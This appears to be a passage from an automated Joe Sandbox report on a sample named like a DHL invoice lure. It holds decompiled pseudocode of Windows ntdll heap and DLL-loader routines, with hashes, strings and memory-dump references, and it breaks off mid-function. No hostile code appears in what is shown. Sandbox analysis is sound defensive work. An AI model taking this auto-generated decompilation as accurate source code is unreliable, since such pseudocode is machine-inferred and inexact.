String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: b372167c8a56f1c00649414995c361582b25e87a640e9ff3775758391048979f
Instruction ID: bc3f0ad966acda16a04bb9e836e2fa5b5ca303f97d643ece6a0e39ecd09ac19d
Opcode Fuzzy Hash: b372167c8a56f1c00649414995c361582b25e87a640e9ff3775758391048979f
Instruction Fuzzy Hash: 0CD1F336904699DFCB06CFA8D844BBDBBF2FF49720F058059F4459B262C735A942CB16

Uniqueness

Uniqueness Score: -1.00%

Function 1D7D4C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117
timeCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E1D7D4C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x1d8965e4; // 0x75f6f0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x1d895b24; // 0x17e2d00
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_t47 = 0x5c;
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x1d8965e4; // 0x75f6f0e0
					 *0x1d8991e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E1D7A26A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x1d8937c0 & 0x00000003) != 0) {
								E1D81E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x1d8937c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1d8937c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
						E1D81E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}

0x1d7d4c42
0x1d7d4c47
0x1d7d4c4a
0x1d7d4c4c
0x1d7d4c52
0x1d7d4cb8
0x1d7d4cbe
0x1d7d4cbe
0x1d7d4c5a
0x1d7d4c5d
0x1d7d4c69
0x1d7d4c6f
0x1d7d4c74
0x1d7d4cd6
0x1d7d4cda
0x1d8133b9
0x1d8133be
0x1d8133f7
0x1d8133f7
0x1d8133be
0x1d7d4cda
0x1d7d4c76
0x1d7d4c84
0x1d7d4c8c
0x1d7d4c90
0x1d7d4ca9
0x1d7d4ca9
0x1d7d4cae
0x1d7d4ce4
0x1d7d4cee
0x1d7d4cf3
0x1d7d4cf3
0x1d7d4ce6
0x1d7d4ce6
0x1d7d4cb2
0x1d813463
0x1d81347b
0x1d813480
0x1d81348a
0x1d813490
0x1d813490
0x1d81348a
0x00000000
0x1d7d4cb2
0x1d7d4c98
0x1d7d4cc5
0x1d813429
0x00000000
0x00000000
0x1d81342f
0x1d7d4cc5
0x1d7d4ca1
0x1d813434
0x1d813435
0x1d81344f
0x1d813454
0x1d813454
0x1d7d4ca7
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1D7D4C84

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1D813439
minkernel\ntdll\ldrsnap.c, xrefs: 1D81344A, 1D813476
LdrpFindDllActivationContext, xrefs: 1D813440, 1D81346C
Querying the active activation context failed with status 0x%08lx, xrefs: 1D813466

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 6d2c88c66ae23a2f0d3c8ace4685521922d519a443c7d3d7f319abf673d69ce9
Instruction ID: fedae6924aeafa5b046a26d5f8d459c21efd7fd18aedae056adf64208eff86af
Opcode Fuzzy Hash: 6d2c88c66ae23a2f0d3c8ace4685521922d519a443c7d3d7f319abf673d69ce9
Instruction Fuzzy Hash: 3C31D772E00BA2AFDB569B08CC85BF9B7A4BB4577CF068127E44D5B161E7609C80C393

Uniqueness

Uniqueness Score: -1.00%

Function 1D7B0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E1D7B0680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E1D7B0ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x1d896960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E1D79B910();
						} else {
							E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E1D79B910();
						__eflags =  *0x1d895da8;
						if(__eflags == 0) {
							E1D85FC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x1d896d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x1d8991e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push(0x1c);
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = E1D7E2BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E1D865FED(0, _t300, 1, _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x1d89373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E1D7E2B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E1D85EFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E1D85D646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E1D865FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E1D7B096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E1D865FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E1D7B3C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E1D85F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E1D7B3C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E1D85F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E1D7B036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E1D865FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E1D865FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x1d89432c; // 0x0
						_v24 = 0x1d89432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}

0x1d7b0689
0x1d7b068d
0x1d7b0690
0x1d7b0699
0x1d7b06a3
0x1d7b0929
0x00000000
0x1d7b0929
0x1d7b06b0
0x1d804e97
0x1d804e99
0x1d804e9f
0x1d804ea5
0x1d804ea9
0x1d804eca
0x1d804ecf
0x1d804eab
0x1d804ec0
0x1d804ec5
0x1d804ed7
0x1d804edc
0x1d804ee4
0x1d804eeb
0x1d804ef6
0x1d804ef6
0x1d804eeb
0x1d804e99
0x1d7b06b6
0x1d7b06b9
0x1d7b06b9
0x1d7b06be
0x1d7b0921
0x1d7b06c4
0x1d7b06c4
0x1d7b06c4
0x1d7b06ca
0x1d7b06d3
0x1d7b06d9
0x1d7b06dc
0x1d804f0a
0x1d804f10
0x1d804f13
0x00000000
0x1d7b06e2
0x1d7b06e2
0x1d7b06f2
0x1d7b0930
0x1d7b0936
0x1d7b0938
0x1d7b093e
0x1d7b093e
0x1d7b0938
0x1d7b06ff
0x1d804f1b
0x1d804f1d
0x1d804f22
0x1d804f29
0x1d804f2a
0x1d804f2c
0x1d804f2d
0x1d804f2f
0x1d804f34
0x1d804f36
0x1d804f39
0x1d804f44
0x1d804f4d
0x1d804f4f
0x1d804f54
0x1d804f5b
0x1d804f5b
0x00000000
0x1d804f5b
0x1d804f3b
0x1d804f3d
0x00000000
0x00000000
0x1d804f3f
0x1d804f42
0x00000000
0x00000000
0x00000000
0x1d7b0705
0x1d7b0705
0x1d7b070c
0x1d7b070e
0x1d7b0724
0x1d7b0727
0x1d7b072d
0x1d7b0730
0x1d7b0751
0x1d7b0751
0x1d7b0757
0x1d7b075c
0x1d7b075d
0x1d7b075f
0x1d7b0760
0x1d7b0762
0x1d7b0767
0x1d7b076a
0x1d7b076a
0x1d7b0770
0x1d7b0772
0x1d804f9f
0x00000000
0x1d804f9f
0x1d7b077e
0x1d7b0783
0x1d804faa
0x1d804fad
0x00000000
0x00000000
0x1d804fbc
0x1d7b078e
0x1d7b0791
0x1d804fcc
0x1d804fd3
0x1d804fe2
0x1d804fe2
0x1d804fd3
0x1d7b079b
0x1d7b07a0
0x1d7b07a4
0x1d7b07b0
0x1d7b07b7
0x1d804fec
0x1d804ff1
0x1d804ff1
0x1d7b07b7
0x1d7b07bd
0x1d7b07c1
0x1d7b07c5
0x1d7b07c8
0x1d7b07cb
0x1d7b07d0
0x1d7b07d3
0x1d7b07d3
0x1d7b07d6
0x1d805008
0x1d7b07e4
0x1d7b07e4
0x1d7b07e6
0x1d7b07e6
0x1d7b07e9
0x1d7b07ee
0x1d7b081b
0x1d7b081b
0x1d7b081e
0x1d7b0827
0x1d7b082d
0x1d7b0833
0x1d7b0839
0x1d7b083f
0x1d7b0848
0x1d7b08fd
0x1d7b0903
0x1d7b0903
0x1d7b084e
0x1d7b0851
0x1d7b0855
0x1d7b0945
0x1d7b094d
0x1d7b0950
0x1d7b0953
0x1d7b0964
0x00000000
0x1d7b0964
0x1d7b0955
0x00000000
0x1d7b085b
0x1d7b085b
0x1d7b086e
0x1d7b0876
0x1d7b0879
0x1d7b0879
0x1d7b087c
0x1d7b0880
0x1d7b0885
0x1d7b08dd
0x1d7b08de
0x1d7b08e1
0x1d7b08e6
0x1d7b08f3
0x1d7b08f8
0x1d7b08f8
0x1d7b0887
0x1d7b0887
0x1d7b0887
0x1d7b0889
0x1d7b0892
0x1d7b0897
0x1d80505d
0x1d805060
0x00000000
0x00000000
0x1d80506f
0x1d7b08a2
0x1d7b08a5
0x1d805079
0x1d80507f
0x1d805086
0x00000000
0x00000000
0x1d805091
0x1d805093
0x1d8050a5
0x1d805095
0x1d80509e
0x1d80509e
0x1d8050af
0x1d8050be
0x1d7b08ae
0x1d7b08b4
0x1d7b08b9
0x1d8050c8
0x1d8050cb
0x00000000
0x00000000
0x1d8050da
0x1d7b08c4
0x1d7b08c7
0x1d8050e9
0x1d8050eb
0x1d8050fd
0x1d8050ed
0x1d8050f6
0x1d8050f6
0x1d805113
0x1d805113
0x00000000
0x1d7b08cd
0x1d7b08bf
0x1d7b08bf
0x00000000
0x1d7b08bf
0x1d7b08ab
0x1d7b08ab
0x00000000
0x1d7b08ab
0x1d7b089d
0x1d7b089d
0x00000000
0x1d7b089d
0x1d7b07f0
0x1d7b07f0
0x1d7b07f8
0x1d805014
0x1d805017
0x1d80501a
0x1d805036
0x1d80503d
0x00000000
0x00000000
0x00000000
0x00000000
0x1d80501c
0x1d80501c
0x1d80501c
0x1d80501e
0x1d805020
0x1d805023
0x1d805026
0x00000000
0x00000000
0x1d805028
0x1d80502b
0x1d80502e
0x00000000
0x00000000
0x00000000
0x1d805030
0x1d805035
0x1d805035
0x00000000
0x1d805035
0x1d7b07fe
0x1d7b07fe
0x1d7b0801
0x1d7b0803
0x1d7b0808
0x1d805053
0x1d7b0816
0x1d7b0816
0x1d7b0818
0x1d7b0818
0x00000000
0x1d7b0808
0x1d7b07ee
0x1d7b0789
0x1d7b0789
0x00000000
0x1d7b0789
0x1d7b0732
0x1d7b0736
0x1d804f63
0x1d804f66
0x1d804f66
0x1d804f6b
0x1d804f6d
0x00000000
0x00000000
0x1d804f76
0x1d804f79
0x1d804f7b
0x1d804f8d
0x1d804f92
0x1d804f92
0x1d804f95
0x00000000
0x1d804f95
0x1d7b073c
0x1d7b0742
0x1d7b074b
0x00000000
0x00000000
0x00000000
0x1d7b074b
0x1d7b06ff

Strings

HEAP[%wZ]: , xrefs: 1D804EBB
(UCRBlock->Size >= *Size), xrefs: 1D804ED7
HEAP: , xrefs: 1D804ECA

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: dd7a284a618404f044f9a4a88219ab54f2c7e31a52d4e0891e654849444c1589
Instruction ID: 80d9540c99a2c341180552754f1cff03d760632507dff45268cb9eba16d6bfae
Opcode Fuzzy Hash: dd7a284a618404f044f9a4a88219ab54f2c7e31a52d4e0891e654849444c1589
Instruction Fuzzy Hash: 75F1DF74A00656DFDB16CF68C884F6AB7B5FF85710F1081A9E5099B391D730FA81CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D87ACEB Relevance: 6.4, APIs: 4, Instructions: 450
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 45%

			E1D87ACEB(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int* _v12;
				signed char _v13;
				signed char _v14;
				signed char _v16;
				signed int _v20;
				signed int _v21;
				signed int _v22;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int* _t146;
				signed int _t149;
				signed int _t151;
				signed int _t167;
				signed int _t169;
				signed int _t173;
				signed char _t176;
				signed int _t195;
				void* _t211;
				signed int _t250;
				signed int _t251;
				signed int _t253;
				intOrPtr* _t254;
				signed int _t261;
				signed char _t267;
				signed char _t274;
				intOrPtr _t283;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int* _t304;
				signed char _t305;
				void* _t333;
				unsigned int _t335;
				signed int _t336;
				signed char _t337;
				unsigned int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				intOrPtr _t349;
				signed char _t351;
				signed int _t353;
				signed char _t354;
				unsigned int _t355;
				unsigned int _t356;
				signed int _t358;
				unsigned int _t360;
				void* _t361;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				signed char* _t374;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed char _t381;
				unsigned int _t383;

				_t146 = __edx;
				_v8 = __ecx;
				_v12 = __edx;
				_t251 = 0x4cb2f;
				_t3 = _t146 + 4; // 0x8b0775c0
				_t374 =  *_t3;
				_t360 =  *__edx << 2;
				if(_t360 < 8) {
					L3:
					_t361 = _t360 - 1;
					if(_t361 == 0) {
						L16:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						L17:
						_t375 = _v8;
						_t12 = _t375 + 0x1c; // 0x1d87abd2
						_v24 = _t12;
						_t149 = L1D7A53C0(_t12);
						_t362 = 0;
						while(1) {
							L18:
							_t14 = _t375 + 4; // 0x8bf8558b
							_t335 =  *_t14;
							_t151 = (_t149 | 0xffffffff) << (_t335 & 0x0000001f);
							_t267 = _t251 & _t151;
							_v28 = _t151;
							_v20 = _t267;
							_v16 = _t267;
							if(_t362 != 0) {
								goto L21;
							}
							_t356 = _t335 >> 5;
							if(_t356 == 0) {
								_t362 = 0;
								L30:
								if(_t362 == 0) {
									L34:
									_t33 = _t375 + 0x1c; // 0x1d87abd2
									L1D7A52F0(_t267, _t33);
									_t35 = _t375 + 0x28; // 0x8b0a74f6
									_t36 = _t375 + 0x20; // 0x8bb372c7
									 *0x1d8991e0(0xc +  *_v12 * 4,  *_t35);
									_t337 =  *((intOrPtr*)( *_t36))();
									_v16 = _t337;
									if(_t337 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										 *(_t337 + 8) =  *(_t337 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t337 + 0xb)) =  *_v12;
										 *(_t337 + 4) = _t251;
										_t46 = _t337 + 0xc; // 0xc
										_t167 = L1D7B2330(E1D7E88C0(_t46, _v12[1],  *_v12 << 2), _v24);
										_t377 = _v8;
										_t364 = 0;
										do {
											_t49 = _t377 + 4; // 0x8bf8558b
											_t338 =  *_t49;
											_t169 = (_t167 | 0xffffffff) << (_t338 & 0x0000001f);
											_v28 = _t169;
											_t274 = _t169 & _t251;
											_v20 = _t274;
											_v24 = _t274;
											if(_t364 != 0) {
												L40:
												_t339 = _v28;
												while(1) {
													_t364 =  *_t364;
													if((_t364 & 0x00000001) != 0) {
														break;
													}
													if(_t274 == ( *(_t364 + 4) & _t339)) {
														L45:
														if(_t364 == 0) {
															L52:
															_t253 = _t377;
															_t68 = _t253 + 0x28; // 0x8b0a74f6
															_t69 = _t253 + 4; // 0x8bf8558b
															_t378 =  *_t69;
															_t70 = _t253 + 0x20; // 0x8bb372c7
															_t365 =  *_t70;
															_v28 =  *_t68;
															_t72 = _t253 + 0x24; // 0x85f633fe
															_v40 =  *_t72;
															_t173 = _t378 >> 5;
															if( *_t253 < _t173 + _t173) {
																L73:
																_t380 = _v16;
																_t364 = _t380;
																_t176 = (_t173 | 0xffffffff) << (_t378 & 0x0000001f) &  *(_t380 + 4);
																_v40 = _t176;
																_v28 = _t176;
																_t343 = (_t378 >> 0x00000005) - 0x00000001 & ((((_t176 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_v40 & 0x000000ff)) * 0x00000025 + (_v26 & 0x000000ff)) * 0x00000025 + (_v25 & 0x000000ff);
																_t136 = _t253 + 8; // 0xc183f44d
																_t283 =  *_t136;
																 *_t380 =  *(_t283 + _t343 * 4);
																 *(_t283 + _t343 * 4) = _t380;
																 *_t253 =  *_t253 + 1;
																_t381 = 0;
																L74:
																_t141 = _t253 + 0x1c; // 0x1d87abd2
																E1D7B24D0(_t141);
																if(_t381 != 0) {
																	_t142 = _t253 + 0x28; // 0x8b0a74f6
																	_t143 = _t253 + 0x24; // 0x85f633fe
																	 *0x1d8991e0(_t381,  *_t142);
																	 *((intOrPtr*)( *_t143))();
																}
																L76:
																return _t364;
															}
															_t285 = 2;
															_t173 = E1D7D4CF8( &_v24, _t173 * _t285, _t173 * _t285 >> 0x20);
															if(_t173 < 0) {
																goto L73;
															}
															_t383 = _v24;
															if(_t383 < 4) {
																_t383 = 4;
															}
															 *0x1d8991e0(_t383 << 2, _v28);
															_t173 =  *_t365();
															_t345 = _t173;
															_v12 = _t345;
															if(_t345 == 0) {
																_t144 = _t253 + 4; // 0x8bf8558b
																_t378 =  *_t144;
																if(_t378 >= 0x20) {
																	goto L73;
																}
																_t381 = _v16;
																_t364 = 0;
																goto L74;
															} else {
